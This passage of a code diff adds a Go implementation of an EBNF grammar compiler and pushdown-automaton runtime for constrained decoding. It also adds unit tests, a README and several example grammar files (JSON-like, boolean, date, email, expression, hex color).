// Loop: entry -> (body) -> entry
|
||||
return c.compileExpr(rep.Body, entry, entry)
|
||||
}
|
||||
|
||||
func (c *compiler) compileRange(r *ebnf.Range, entry, exit state) error {
|
||||
// Character range like "a" … "z" or "\u03b1" … "\u03c9"
|
||||
begin := strings.Trim(r.Begin.String, "\"")
|
||||
end := strings.Trim(r.End.String, "\"")
|
||||
|
||||
// Unescape bounds first (so "\u03b1" works)
|
||||
beginUnesc, err := unescapeLiteral(begin)
|
||||
if err != nil {
|
||||
return fmt.Errorf("invalid range begin: %w", err)
|
||||
}
|
||||
endUnesc, err := unescapeLiteral(end)
|
||||
if err != nil {
|
||||
return fmt.Errorf("invalid range end: %w", err)
|
||||
}
|
||||
|
||||
// Validate as single runes (not bytes) for Unicode support
|
||||
beginRunes := []rune(beginUnesc)
|
||||
endRunes := []rune(endUnesc)
|
||||
if len(beginRunes) != 1 || len(endRunes) != 1 {
|
||||
return fmt.Errorf("range bounds must be single characters: %q..%q", r.Begin.String, r.End.String)
|
||||
}
|
||||
|
||||
// Use unescaped rune strings in pattern (consistent with matcher)
|
||||
pattern := fmt.Sprintf("[%s-%s]", string(beginRunes[0]), string(endRunes[0]))
|
||||
c.pda.addTerminal(pattern)
|
||||
|
||||
c.pda.addTransition(transition{
|
||||
FromState: entry,
|
||||
Pattern: pattern,
|
||||
ToState: exit,
|
||||
})
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// runtime represents a pda execution instance.
|
||||
type runtime struct {
|
||||
pda *pda
|
||||
state state
|
||||
stack []stackSymbol
|
||||
}
|
||||
|
||||
// newRuntime creates a new pda runtime.
|
||||
func newRuntime(pda *pda) *runtime {
|
||||
return &runtime{
|
||||
pda: pda,
|
||||
state: pda.StartState,
|
||||
stack: make([]stackSymbol, 0, 32),
|
||||
}
|
||||
}
|
||||
|
||||
// stackTop returns the top of the stack, or stackEmpty if empty.
|
||||
func (r *runtime) stackTop() stackSymbol {
|
||||
if len(r.stack) == 0 {
|
||||
return stackEmpty
|
||||
}
|
||||
return r.stack[len(r.stack)-1]
|
||||
}
|
||||
|
||||
// isAccepting returns true if we can reach an accepting state via epsilon transitions
|
||||
// with an empty stack.
|
||||
func (r *runtime) isAccepting() bool {
|
||||
return r.canReachAccept(r.state, r.stack, make(map[stateStackKey]bool))
|
||||
}
|
||||
|
||||
func (r *runtime) canReachAccept(state state, stack []stackSymbol, visited map[stateStackKey]bool) bool {
|
||||
// Check if this state is accepting with empty stack
|
||||
if r.pda.AcceptStates[state] && len(stack) == 0 {
|
||||
return true
|
||||
}
|
||||
|
||||
// Avoid infinite loops
|
||||
key := stateStackKey{state: state, stackSig: stackSignature(stack)}
|
||||
if visited[key] {
|
||||
return false
|
||||
}
|
||||
visited[key] = true
|
||||
|
||||
// Try epsilon transitions
|
||||
for _, t := range r.pda.Transitions[state] {
|
||||
if t.Pattern != "" {
|
||||
continue // Not epsilon
|
||||
}
|
||||
|
||||
// Check stack constraint
|
||||
stackTop := stackEmpty
|
||||
if len(stack) > 0 {
|
||||
stackTop = stack[len(stack)-1]
|
||||
}
|
||||
if t.stackTop != stackEmpty && t.stackTop != stackTop {
|
||||
continue
|
||||
}
|
||||
|
||||
// Simulate stack operations
|
||||
newStack := make([]stackSymbol, len(stack))
|
||||
copy(newStack, stack)
|
||||
|
||||
if t.StackPop > 0 && len(newStack) >= t.StackPop {
|
||||
newStack = newStack[:len(newStack)-t.StackPop]
|
||||
}
|
||||
newStack = append(newStack, t.StackPush...)
|
||||
|
||||
if r.canReachAccept(t.ToState, newStack, visited) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// Reset resets the runtime to initial state.
|
||||
func (r *runtime) Reset() {
|
||||
r.state = r.pda.StartState
|
||||
r.stack = r.stack[:0]
|
||||
}
|
||||
|
||||
// validInputs returns all valid input patterns from current state.
|
||||
func (r *runtime) validInputs() []string {
|
||||
var valid []string
|
||||
seen := make(map[string]bool)
|
||||
visited := make(map[stateStackKey]bool)
|
||||
|
||||
// Make a copy of the stack for simulation
|
||||
simStack := make([]stackSymbol, len(r.stack))
|
||||
copy(simStack, r.stack)
|
||||
|
||||
r.collectValidInputs(r.state, simStack, seen, visited, &valid)
|
||||
return valid
|
||||
}
|
||||
|
||||
// stateStackKey is used to detect cycles in epsilon closure
|
||||
type stateStackKey struct {
|
||||
state state
|
||||
stackSig string
|
||||
}
|
||||
|
||||
func stackSignature(stack []stackSymbol) string {
|
||||
if len(stack) == 0 {
|
||||
return ""
|
||||
}
|
||||
buf := make([]byte, len(stack)*8)
|
||||
for i, sym := range stack {
|
||||
binary.LittleEndian.PutUint64(buf[i*8:], uint64(sym))
|
||||
}
|
||||
return string(buf)
|
||||
}
|
||||
|
||||
func (r *runtime) collectValidInputs(state state, simStack []stackSymbol, seen map[string]bool, visited map[stateStackKey]bool, valid *[]string) {
|
||||
// Get stack top for comparisons
|
||||
stackTop := stackEmpty
|
||||
if len(simStack) > 0 {
|
||||
stackTop = simStack[len(simStack)-1]
|
||||
}
|
||||
|
||||
// Check for cycles to avoid infinite loops
|
||||
key := stateStackKey{state: state, stackSig: stackSignature(simStack)}
|
||||
if visited[key] {
|
||||
return
|
||||
}
|
||||
visited[key] = true
|
||||
|
||||
transitions := r.pda.Transitions[state]
|
||||
|
||||
for _, t := range transitions {
|
||||
// Check stack constraint
|
||||
if t.stackTop != stackEmpty && t.stackTop != stackTop {
|
||||
continue
|
||||
}
|
||||
|
||||
if t.Pattern == "" {
|
||||
// Epsilon transition - simulate stack operations
|
||||
newStack := make([]stackSymbol, len(simStack))
|
||||
copy(newStack, simStack)
|
||||
|
||||
// Pop
|
||||
if t.StackPop > 0 {
|
||||
if len(newStack) < t.StackPop {
|
||||
continue // Can't pop, skip this transition
|
||||
}
|
||||
newStack = newStack[:len(newStack)-t.StackPop]
|
||||
}
|
||||
|
||||
// Push
|
||||
newStack = append(newStack, t.StackPush...)
|
||||
|
||||
r.collectValidInputs(t.ToState, newStack, seen, visited, valid)
|
||||
} else {
|
||||
// terminal - add if not seen
|
||||
if !seen[t.Pattern] {
|
||||
seen[t.Pattern] = true
|
||||
*valid = append(*valid, t.Pattern)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// matchesPattern checks if input matches a pattern.
|
||||
// Patterns can be:
|
||||
// - Exact strings: "a", "{", "true"
|
||||
// - Character ranges: "[a-z]", "[0-9]", "[#-~]"
|
||||
func matchesPattern(input, pattern string) bool {
|
||||
// Exact match
|
||||
if input == pattern {
|
||||
return true
|
||||
}
|
||||
|
||||
// Check for character range pattern [X-Y]
|
||||
if len(pattern) == 5 && pattern[0] == '[' && pattern[2] == '-' && pattern[4] == ']' {
|
||||
if len(input) != 1 {
|
||||
return false
|
||||
}
|
||||
ch := input[0]
|
||||
low := pattern[1]
|
||||
high := pattern[3]
|
||||
return ch >= low && ch <= high
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// Accept tries to accept an input, returning true if successful.
|
||||
func (r *runtime) Accept(input string) bool {
|
||||
return r.accept(input, make(map[stateStackKey]bool))
|
||||
}
|
||||
|
||||
func (r *runtime) accept(input string, visited map[stateStackKey]bool) bool {
|
||||
key := stateStackKey{state: r.state, stackSig: stackSignature(r.stack)}
|
||||
if visited[key] {
|
||||
return false
|
||||
}
|
||||
visited[key] = true
|
||||
|
||||
transitions := r.pda.Transitions[r.state]
|
||||
|
||||
// First, process any epsilon transitions to reach a state that can accept input
|
||||
// This is a simplified version - full implementation would need epsilon closure
|
||||
for _, t := range transitions {
|
||||
if matchesPattern(input, t.Pattern) {
|
||||
if t.stackTop != stackEmpty && t.stackTop != r.stackTop() {
|
||||
continue
|
||||
}
|
||||
if t.StackPop > len(r.stack) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Apply transition
|
||||
r.applyTransition(t)
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
// Try epsilon transitions first
|
||||
for _, t := range transitions {
|
||||
if t.Pattern == "" {
|
||||
if t.stackTop != stackEmpty && t.stackTop != r.stackTop() {
|
||||
continue
|
||||
}
|
||||
if t.StackPop > len(r.stack) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Save state for backtracking
|
||||
oldState := r.state
|
||||
oldStack := make([]stackSymbol, len(r.stack))
|
||||
copy(oldStack, r.stack)
|
||||
|
||||
r.applyTransition(t)
|
||||
|
||||
if r.accept(input, visited) {
|
||||
return true
|
||||
}
|
||||
|
||||
// Backtrack
|
||||
r.state = oldState
|
||||
r.stack = oldStack
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
func (r *runtime) applyTransition(t transition) {
|
||||
// Pop
|
||||
if t.StackPop > 0 && len(r.stack) >= t.StackPop {
|
||||
r.stack = r.stack[:len(r.stack)-t.StackPop]
|
||||
}
|
||||
|
||||
// Push
|
||||
r.stack = append(r.stack, t.StackPush...)
|
||||
|
||||
// Move to new state
|
||||
r.state = t.ToState
|
||||
}
|
||||
540
x/grammar/grammar_test.go
Normal file
540
x/grammar/grammar_test.go
Normal file
@@ -0,0 +1,540 @@
|
||||
//go:build mlx
|
||||
|
||||
package grammar
|
||||
|
||||
import (
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestCompileSimpleGrammar(t *testing.T) {
|
||||
// Simple grammar: S = "a" "b" .
|
||||
grammar := `S = "a" "b" .`
|
||||
|
||||
pda, err := compileString(grammar, "S")
|
||||
if err != nil {
|
||||
t.Fatalf("compile failed: %v", err)
|
||||
}
|
||||
|
||||
if pda == nil {
|
||||
t.Fatal("pda is nil")
|
||||
}
|
||||
|
||||
// Should have terminals "a" and "b"
|
||||
if len(pda.Terminals) != 2 {
|
||||
t.Errorf("expected 2 terminals, got %d: %v", len(pda.Terminals), pda.Terminals)
|
||||
}
|
||||
|
||||
// Test runtime
|
||||
rt := newRuntime(pda)
|
||||
|
||||
// Should accept "a" then "b"
|
||||
if !rt.Accept("a") {
|
||||
t.Error("should accept 'a'")
|
||||
}
|
||||
if !rt.Accept("b") {
|
||||
t.Error("should accept 'b'")
|
||||
}
|
||||
if !rt.isAccepting() {
|
||||
t.Error("should be in accepting state")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCompileAlternative(t *testing.T) {
|
||||
// Grammar: S = "a" | "b" .
|
||||
grammar := `S = "a" | "b" .`
|
||||
|
||||
pda, err := compileString(grammar, "S")
|
||||
if err != nil {
|
||||
t.Fatalf("compile failed: %v", err)
|
||||
}
|
||||
|
||||
// Test accepting "a"
|
||||
rt := newRuntime(pda)
|
||||
if !rt.Accept("a") {
|
||||
t.Error("should accept 'a'")
|
||||
}
|
||||
if !rt.isAccepting() {
|
||||
t.Error("should be accepting after 'a'")
|
||||
}
|
||||
|
||||
// Test accepting "b"
|
||||
rt.Reset()
|
||||
if !rt.Accept("b") {
|
||||
t.Error("should accept 'b'")
|
||||
}
|
||||
if !rt.isAccepting() {
|
||||
t.Error("should be accepting after 'b'")
|
||||
}
|
||||
|
||||
// Test rejecting "c"
|
||||
rt.Reset()
|
||||
if rt.Accept("c") {
|
||||
t.Error("should not accept 'c'")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCompileRepetition(t *testing.T) {
|
||||
// Grammar: S = {"a"} .
|
||||
grammar := `S = {"a"} .`
|
||||
|
||||
pda, err := compileString(grammar, "S")
|
||||
if err != nil {
|
||||
t.Fatalf("compile failed: %v", err)
|
||||
}
|
||||
|
||||
// Empty should be accepted (zero repetitions)
|
||||
rt := newRuntime(pda)
|
||||
if !rt.isAccepting() {
|
||||
t.Error("empty should be accepting")
|
||||
}
|
||||
|
||||
// "a" should be accepted
|
||||
rt.Reset()
|
||||
if !rt.Accept("a") {
|
||||
t.Error("should accept first 'a'")
|
||||
}
|
||||
if !rt.isAccepting() {
|
||||
t.Error("should be accepting after one 'a'")
|
||||
}
|
||||
|
||||
// "aa" should be accepted
|
||||
if !rt.Accept("a") {
|
||||
t.Error("should accept second 'a'")
|
||||
}
|
||||
if !rt.isAccepting() {
|
||||
t.Error("should be accepting after two 'a's")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCompileOption(t *testing.T) {
|
||||
// Grammar: S = ["a"] "b" .
|
||||
grammar := `S = ["a"] "b" .`
|
||||
|
||||
pda, err := compileString(grammar, "S")
|
||||
if err != nil {
|
||||
t.Fatalf("compile failed: %v", err)
|
||||
}
|
||||
|
||||
// "b" alone should be accepted
|
||||
rt := newRuntime(pda)
|
||||
if !rt.Accept("b") {
|
||||
t.Error("should accept 'b' alone")
|
||||
}
|
||||
if !rt.isAccepting() {
|
||||
t.Error("should be accepting after 'b'")
|
||||
}
|
||||
|
||||
// "ab" should be accepted
|
||||
rt.Reset()
|
||||
if !rt.Accept("a") {
|
||||
t.Error("should accept 'a'")
|
||||
}
|
||||
if !rt.Accept("b") {
|
||||
t.Error("should accept 'b' after 'a'")
|
||||
}
|
||||
if !rt.isAccepting() {
|
||||
t.Error("should be accepting after 'ab'")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCompileRecursive(t *testing.T) {
|
||||
// Grammar with recursion: S = "(" S ")" | "x" .
|
||||
grammar := `S = "(" S ")" | "x" .`
|
||||
|
||||
pda, err := compileString(grammar, "S")
|
||||
if err != nil {
|
||||
t.Fatalf("compile failed: %v", err)
|
||||
}
|
||||
|
||||
// "x" should be accepted
|
||||
rt := newRuntime(pda)
|
||||
if !rt.Accept("x") {
|
||||
t.Error("should accept 'x'")
|
||||
}
|
||||
if !rt.isAccepting() {
|
||||
t.Error("should be accepting after 'x'")
|
||||
}
|
||||
|
||||
// "(x)" should be accepted
|
||||
rt.Reset()
|
||||
if !rt.Accept("(") {
|
||||
t.Error("should accept '('")
|
||||
}
|
||||
if !rt.Accept("x") {
|
||||
t.Error("should accept 'x' inside parens")
|
||||
}
|
||||
if !rt.Accept(")") {
|
||||
t.Error("should accept ')'")
|
||||
}
|
||||
if !rt.isAccepting() {
|
||||
t.Error("should be accepting after '(x)'")
|
||||
}
|
||||
|
||||
// "((x))" should be accepted
|
||||
rt.Reset()
|
||||
if !rt.Accept("(") {
|
||||
t.Error("should accept first '('")
|
||||
}
|
||||
if !rt.Accept("(") {
|
||||
t.Error("should accept second '('")
|
||||
}
|
||||
if !rt.Accept("x") {
|
||||
t.Error("should accept 'x'")
|
||||
}
|
||||
if !rt.Accept(")") {
|
||||
t.Error("should accept first ')'")
|
||||
}
|
||||
if !rt.Accept(")") {
|
||||
t.Error("should accept second ')'")
|
||||
}
|
||||
if !rt.isAccepting() {
|
||||
t.Error("should be accepting after '((x))'")
|
||||
}
|
||||
}
|
||||
|
||||
func TestValidInputs(t *testing.T) {
|
||||
// Grammar: S = "a" | "b" .
|
||||
grammar := `S = "a" | "b" .`
|
||||
|
||||
pda, err := compileString(grammar, "S")
|
||||
if err != nil {
|
||||
t.Fatalf("compile failed: %v", err)
|
||||
}
|
||||
|
||||
rt := newRuntime(pda)
|
||||
valid := rt.validInputs()
|
||||
|
||||
// Should have both "a" and "b" as valid
|
||||
hasA, hasB := false, false
|
||||
for _, v := range valid {
|
||||
if v == "a" {
|
||||
hasA = true
|
||||
}
|
||||
if v == "b" {
|
||||
hasB = true
|
||||
}
|
||||
}
|
||||
|
||||
if !hasA {
|
||||
t.Error("'a' should be valid input")
|
||||
}
|
||||
if !hasB {
|
||||
t.Error("'b' should be valid input")
|
||||
}
|
||||
}
|
||||
|
||||
// TestValidInputsAfterAccept tests that validInputs returns correct values
|
||||
// after accepting tokens, ensuring proper stack simulation.
|
||||
func TestValidInputsAfterAccept(t *testing.T) {
|
||||
// Grammar: S = "a" "b" "c" .
|
||||
grammar := `S = "a" "b" "c" .`
|
||||
|
||||
pda, err := compileString(grammar, "S")
|
||||
if err != nil {
|
||||
t.Fatalf("compile failed: %v", err)
|
||||
}
|
||||
|
||||
rt := newRuntime(pda)
|
||||
|
||||
// Initially only "a" should be valid
|
||||
valid := rt.validInputs()
|
||||
if len(valid) != 1 || valid[0] != "a" {
|
||||
t.Errorf("initially expected only 'a', got %v", valid)
|
||||
}
|
||||
|
||||
// After accepting "a", only "b" should be valid
|
||||
if !rt.Accept("a") {
|
||||
t.Fatal("failed to accept 'a'")
|
||||
}
|
||||
valid = rt.validInputs()
|
||||
if len(valid) != 1 || valid[0] != "b" {
|
||||
t.Errorf("after 'a', expected only 'b', got %v", valid)
|
||||
}
|
||||
|
||||
// After accepting "b", only "c" should be valid
|
||||
if !rt.Accept("b") {
|
||||
t.Fatal("failed to accept 'b'")
|
||||
}
|
||||
valid = rt.validInputs()
|
||||
if len(valid) != 1 || valid[0] != "c" {
|
||||
t.Errorf("after 'ab', expected only 'c', got %v", valid)
|
||||
}
|
||||
}
|
||||
|
||||
// TestValidInputsWithRepetitionInProduction tests the critical case where
|
||||
// a repetition exists inside a called production. This requires proper
|
||||
// stack simulation to determine when closing symbols are valid.
|
||||
func TestValidInputsWithRepetitionInProduction(t *testing.T) {
|
||||
// Grammar similar to JSON:
|
||||
// S = "(" items ")" .
|
||||
// items = item { "," item } .
|
||||
// item = "x" .
|
||||
grammar := `
|
||||
S = "(" items ")" .
|
||||
items = item { "," item } .
|
||||
item = "x" .
|
||||
`
|
||||
pda, err := compileString(grammar, "S")
|
||||
if err != nil {
|
||||
t.Fatalf("compile failed: %v", err)
|
||||
}
|
||||
|
||||
rt := newRuntime(pda)
|
||||
|
||||
// Initially only "(" should be valid
|
||||
valid := rt.validInputs()
|
||||
if len(valid) != 1 || valid[0] != "(" {
|
||||
t.Errorf("initially expected only '(', got %v", valid)
|
||||
}
|
||||
|
||||
// Accept "("
|
||||
if !rt.Accept("(") {
|
||||
t.Fatal("failed to accept '('")
|
||||
}
|
||||
// After "(", should be able to accept "x" (item)
|
||||
valid = rt.validInputs()
|
||||
hasX := false
|
||||
for _, v := range valid {
|
||||
if v == "x" {
|
||||
hasX = true
|
||||
}
|
||||
}
|
||||
if !hasX {
|
||||
t.Errorf("after '(', expected 'x' to be valid, got %v", valid)
|
||||
}
|
||||
|
||||
// Accept first item "x"
|
||||
if !rt.Accept("x") {
|
||||
t.Fatal("failed to accept 'x'")
|
||||
}
|
||||
// After "(x", should be able to accept "," (more items) OR ")" (end)
|
||||
valid = rt.validInputs()
|
||||
hasComma, hasClose := false, false
|
||||
for _, v := range valid {
|
||||
if v == "," {
|
||||
hasComma = true
|
||||
}
|
||||
if v == ")" {
|
||||
hasClose = true
|
||||
}
|
||||
}
|
||||
if !hasComma {
|
||||
t.Errorf("after '(x', expected ',' to be valid, got %v", valid)
|
||||
}
|
||||
if !hasClose {
|
||||
t.Errorf("after '(x', expected ')' to be valid, got %v", valid)
|
||||
}
|
||||
|
||||
// Accept comma for another item
|
||||
if !rt.Accept(",") {
|
||||
t.Fatal("failed to accept ','")
|
||||
}
|
||||
// After "(x,", should only be able to accept "x" (next item)
|
||||
valid = rt.validInputs()
|
||||
if len(valid) != 1 || valid[0] != "x" {
|
||||
t.Errorf("after '(x,', expected only 'x', got %v", valid)
|
||||
}
|
||||
|
||||
// Accept second item "x"
|
||||
if !rt.Accept("x") {
|
||||
t.Fatal("failed to accept second 'x'")
|
||||
}
|
||||
// CRITICAL: After "(x,x", should be able to accept "," OR ")"
|
||||
// This tests the stack simulation fix - we need to properly
|
||||
// follow epsilon transitions through the production call stack.
|
||||
valid = rt.validInputs()
|
||||
hasComma, hasClose = false, false
|
||||
for _, v := range valid {
|
||||
if v == "," {
|
||||
hasComma = true
|
||||
}
|
||||
if v == ")" {
|
||||
hasClose = true
|
||||
}
|
||||
}
|
||||
if !hasComma {
|
||||
t.Errorf("after '(x,x', expected ',' to be valid, got %v", valid)
|
||||
}
|
||||
if !hasClose {
|
||||
t.Errorf("after '(x,x', expected ')' to be valid, got %v", valid)
|
||||
}
|
||||
|
||||
// Close with ")"
|
||||
if !rt.Accept(")") {
|
||||
t.Fatal("failed to accept ')'")
|
||||
}
|
||||
if !rt.isAccepting() {
|
||||
t.Error("should be accepting after '(x,x)'")
|
||||
}
|
||||
}
|
||||
|
||||
// TestValidInputsNestedCalls tests validInputs with deeply nested production calls.
|
||||
func TestValidInputsNestedCalls(t *testing.T) {
|
||||
// Grammar: A = "start" B "end" . B = "middle" .
|
||||
grammar := `
|
||||
A = "start" B "end" .
|
||||
B = "middle" .
|
||||
`
|
||||
pda, err := compileString(grammar, "A")
|
||||
if err != nil {
|
||||
t.Fatalf("compile failed: %v", err)
|
||||
}
|
||||
|
||||
rt := newRuntime(pda)
|
||||
|
||||
// After "start", should accept "middle" (from B)
|
||||
rt.Accept("start")
|
||||
valid := rt.validInputs()
|
||||
if len(valid) != 1 || valid[0] != "middle" {
|
||||
t.Errorf("after 'start', expected 'middle', got %v", valid)
|
||||
}
|
||||
|
||||
// After "start middle", should accept "end"
|
||||
rt.Accept("middle")
|
||||
valid = rt.validInputs()
|
||||
if len(valid) != 1 || valid[0] != "end" {
|
||||
t.Errorf("after 'start middle', expected 'end', got %v", valid)
|
||||
}
|
||||
}
|
||||
|
||||
func TestReturnAddressDisambiguation(t *testing.T) {
|
||||
// Grammar where the same production is called from different contexts:
|
||||
// S = A "x" | "c" A "y" .
|
||||
// A = "a" .
|
||||
grammar := `
|
||||
S = A "x" | "c" A "y" .
|
||||
A = "a" .
|
||||
`
|
||||
pda, err := compileString(grammar, "S")
|
||||
if err != nil {
|
||||
t.Fatalf("compile failed: %v", err)
|
||||
}
|
||||
|
||||
rt := newRuntime(pda)
|
||||
|
||||
if !rt.Accept("c") {
|
||||
t.Fatal("failed to accept 'c'")
|
||||
}
|
||||
if !rt.Accept("a") {
|
||||
t.Fatal("failed to accept 'a'")
|
||||
}
|
||||
|
||||
valid := rt.validInputs()
|
||||
if len(valid) != 1 || valid[0] != "y" {
|
||||
t.Errorf("after 'ca', expected only 'y', got %v", valid)
|
||||
}
|
||||
|
||||
rt.Reset()
|
||||
rt.Accept("c")
|
||||
rt.Accept("a")
|
||||
if rt.Accept("x") {
|
||||
t.Error("should not accept 'x' after 'ca'")
|
||||
}
|
||||
}
|
||||
|
||||
// TestValidInputsRecursiveWithStack tests validInputs with recursive grammars
|
||||
// which heavily exercise the stack simulation.
|
||||
func TestValidInputsRecursiveWithStack(t *testing.T) {
|
||||
// Grammar: S = "(" S ")" | "x" .
|
||||
grammar := `S = "(" S ")" | "x" .`
|
||||
|
||||
pda, err := compileString(grammar, "S")
|
||||
if err != nil {
|
||||
t.Fatalf("compile failed: %v", err)
|
||||
}
|
||||
|
||||
rt := newRuntime(pda)
|
||||
|
||||
// Initially: "(" or "x" should be valid
|
||||
valid := rt.validInputs()
|
||||
hasParen, hasX := false, false
|
||||
for _, v := range valid {
|
||||
if v == "(" {
|
||||
hasParen = true
|
||||
}
|
||||
if v == "x" {
|
||||
hasX = true
|
||||
}
|
||||
}
|
||||
if !hasParen || !hasX {
|
||||
t.Errorf("initially expected '(' and 'x', got %v", valid)
|
||||
}
|
||||
|
||||
// After "(": "(" or "x" should be valid (nested S)
|
||||
rt.Accept("(")
|
||||
valid = rt.validInputs()
|
||||
hasParen, hasX = false, false
|
||||
for _, v := range valid {
|
||||
if v == "(" {
|
||||
hasParen = true
|
||||
}
|
||||
if v == "x" {
|
||||
hasX = true
|
||||
}
|
||||
}
|
||||
if !hasParen || !hasX {
|
||||
t.Errorf("after '(', expected '(' and 'x', got %v", valid)
|
||||
}
|
||||
|
||||
// After "((": "(" or "x" should still be valid
|
||||
rt.Accept("(")
|
||||
valid = rt.validInputs()
|
||||
hasParen, hasX = false, false
|
||||
for _, v := range valid {
|
||||
if v == "(" {
|
||||
hasParen = true
|
||||
}
|
||||
if v == "x" {
|
||||
hasX = true
|
||||
}
|
||||
}
|
||||
if !hasParen || !hasX {
|
||||
t.Errorf("after '((', expected '(' and 'x', got %v", valid)
|
||||
}
|
||||
|
||||
// After "((x": only ")" should be valid
|
||||
rt.Accept("x")
|
||||
valid = rt.validInputs()
|
||||
if len(valid) != 1 || valid[0] != ")" {
|
||||
t.Errorf("after '((x', expected only ')', got %v", valid)
|
||||
}
|
||||
|
||||
// After "((x)": only ")" should be valid (closing outer)
|
||||
rt.Accept(")")
|
||||
valid = rt.validInputs()
|
||||
if len(valid) != 1 || valid[0] != ")" {
|
||||
t.Errorf("after '((x)', expected only ')', got %v", valid)
|
||||
}
|
||||
}
|
||||
|
||||
// TestRejectionAfterValid tests that invalid inputs are rejected
|
||||
// at various points in the grammar.
|
||||
func TestRejectionAfterValid(t *testing.T) {
|
||||
// Grammar: S = "a" "b" .
|
||||
grammar := `S = "a" "b" .`
|
||||
|
||||
pda, err := compileString(grammar, "S")
|
||||
if err != nil {
|
||||
t.Fatalf("compile failed: %v", err)
|
||||
}
|
||||
|
||||
rt := newRuntime(pda)
|
||||
|
||||
// "b" should be rejected initially
|
||||
if rt.Accept("b") {
|
||||
t.Error("'b' should be rejected initially")
|
||||
}
|
||||
|
||||
// Accept "a"
|
||||
rt.Accept("a")
|
||||
|
||||
// "a" should be rejected after "a"
|
||||
if rt.Accept("a") {
|
||||
t.Error("'a' should be rejected after 'a'")
|
||||
}
|
||||
|
||||
// "c" should be rejected (not in grammar)
|
||||
if rt.Accept("c") {
|
||||
t.Error("'c' should be rejected (not in grammar)")
|
||||
}
|
||||
}
|
||||
56
x/grammar/grammars/README.md
Normal file
56
x/grammar/grammars/README.md
Normal file
@@ -0,0 +1,56 @@
|
||||
# Example Grammars
|
||||
|
||||
This directory contains example EBNF grammars for constrained decoding.
|
||||
|
||||
## Usage
|
||||
|
||||
```bash
|
||||
go run -tags mlx ./x/imagegen/cmd/engine/ \
|
||||
-model /path/to/model \
|
||||
-prompt "Your prompt" \
|
||||
-grammar x/grammar/grammars/json.ebnf \
|
||||
-grammar-start value
|
||||
```
|
||||
|
||||
## Available Grammars
|
||||
|
||||
| File | Start Rule | Description |
|
||||
|------|------------|-------------|
|
||||
| `json.ebnf` | `value` | Standard JSON (RFC 8259) |
|
||||
| `expression.ebnf` | `expr` | Arithmetic expressions (+, -, *, /, parens) |
|
||||
| `identifier.ebnf` | `ident` | Programming language identifiers |
|
||||
| `boolean.ebnf` | `expr` | Boolean expressions (AND, OR, NOT) |
|
||||
| `list.ebnf` | `list` | Comma-separated word list |
|
||||
| `yesno.ebnf` | `response` | Simple yes/no responses |
|
||||
| `date.ebnf` | `date` | Dates in YYYY-MM-DD format |
|
||||
| `email.ebnf` | `email` | Basic email addresses |
|
||||
| `phone.ebnf` | `phone` | US phone numbers |
|
||||
| `hexcolor.ebnf` | `color` | CSS hex colors (#RGB or #RRGGBB) |
|
||||
| `url.ebnf` | `url` | HTTP/HTTPS URLs |
|
||||
|
||||
## Grammar Syntax
|
||||
|
||||
**Note:** Comments are not supported. Grammar files must contain only EBNF productions.
|
||||
|
||||
The grammars use EBNF notation:
|
||||
|
||||
- `=` defines a production rule
|
||||
- `|` is alternation (or)
|
||||
- `{ }` is repetition (zero or more)
|
||||
- `[ ]` is optional (zero or one)
|
||||
- `" "` is a literal string
|
||||
- `…` is a character range (e.g., `"a" … "z"`)
|
||||
- `.` ends a production
|
||||
|
||||
## Writing Custom Grammars
|
||||
|
||||
1. Define your grammar in a `.ebnf` file
|
||||
2. Choose a start rule name
|
||||
3. Pass `-grammar path/to/grammar.ebnf -grammar-start rulename`
|
||||
|
||||
Example custom grammar for RGB colors:
|
||||
|
||||
```ebnf
|
||||
color = "#" hexdigit hexdigit hexdigit hexdigit hexdigit hexdigit .
|
||||
hexdigit = "0" … "9" | "a" … "f" | "A" … "F" .
|
||||
```
|
||||
7
x/grammar/grammars/boolean.ebnf
Normal file
7
x/grammar/grammars/boolean.ebnf
Normal file
@@ -0,0 +1,7 @@
|
||||
expr = term { " OR " term } .
|
||||
term = factor { " AND " factor } .
|
||||
factor = "NOT " factor | atom | "(" expr ")" .
|
||||
atom = "true" | "false" | ident .
|
||||
ident = letter { letter | digit } .
|
||||
letter = "a" … "z" | "A" … "Z" .
|
||||
digit = "0" … "9" .
|
||||
6
x/grammar/grammars/date.ebnf
Normal file
6
x/grammar/grammars/date.ebnf
Normal file
@@ -0,0 +1,6 @@
|
||||
date = year "-" month "-" day .
|
||||
year = digit digit digit digit .
|
||||
month = ( "0" digit1to9 ) | ( "1" ( "0" | "1" | "2" ) ) .
|
||||
day = ( "0" digit1to9 ) | ( ( "1" | "2" ) digit ) | ( "3" ( "0" | "1" ) ) .
|
||||
digit1to9 = "1" | "2" | "3" | "4" | "5" | "6" | "7" | "8" | "9" .
|
||||
digit = "0" | "1" | "2" | "3" | "4" | "5" | "6" | "7" | "8" | "9" .
|
||||
5
x/grammar/grammars/email.ebnf
Normal file
5
x/grammar/grammars/email.ebnf
Normal file
@@ -0,0 +1,5 @@
|
||||
email = localpart "@" domain .
|
||||
localpart = word { "." word } .
|
||||
domain = word { "." word } .
|
||||
word = alphanum { alphanum | "-" | "_" } .
|
||||
alphanum = "a" … "z" | "A" … "Z" | "0" … "9" .
|
||||
7
x/grammar/grammars/expression.ebnf
Normal file
7
x/grammar/grammars/expression.ebnf
Normal file
@@ -0,0 +1,7 @@
|
||||
expr = term { addop term } .
|
||||
addop = "+" | "-" .
|
||||
term = factor { mulop factor } .
|
||||
mulop = "*" | "/" .
|
||||
factor = number | "(" expr ")" .
|
||||
number = [ "-" ] digit { digit } .
|
||||
digit = "0" | "1" | "2" | "3" | "4" | "5" | "6" | "7" | "8" | "9" .
|
||||
4
x/grammar/grammars/hexcolor.ebnf
Normal file
4
x/grammar/grammars/hexcolor.ebnf
Normal file
@@ -0,0 +1,4 @@
|
||||
color = "#" ( hex6 | hex3 ) .
|
||||
hex6 = hexdigit hexdigit hexdigit hexdigit hexdigit hexdigit .
